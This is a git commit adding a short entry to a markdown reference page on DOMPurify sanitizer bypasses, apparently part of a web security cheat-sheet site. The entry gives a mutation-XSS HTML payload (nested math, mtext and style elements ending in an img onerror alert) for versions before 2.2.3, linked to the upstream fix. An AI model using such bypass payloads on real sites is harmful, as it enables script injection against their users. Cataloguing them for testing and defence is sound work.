add one exploit

xanhacks · Apr 2, 2024 · 212bab9 · 212bab9
1 parent 720f047
commit 212bab9
Showing 1 changed file with 9 additions and 0 deletions.
diff --git a/content/docs/framework/dompurify.md b/content/docs/framework/dompurify.md
@@ -44,6 +44,15 @@ DOMPurify.sanitize('<UL><li><A HREF=//google.com>click</UL>'); // becomes <ul><l
 
 - [Playing with DOMPurify custom elements handling](https://mizu.re/post/playing-with-dompurify-ce-handling)
 
+### Version < 2.2.3
+
+- [Testing a more advanced mXSS mitigation strategy for MathML](https://github.com/cure53/DOMPurify/commit/8ab47b0a694022b396e30b7f643e28971f75f5d8)
+
+```html
+<math><mtext><h1><a><h6></a></h6><mglyph><svg>
+<mtext><style><a title="</style><img src onerror='alert(1)'>"></style></h1>
+```
+
 ### Version <= 2.2.0
 
 - [Bypass in DOMPurify when sanitizing svg elements](https://hackerone.com/reports/1024734)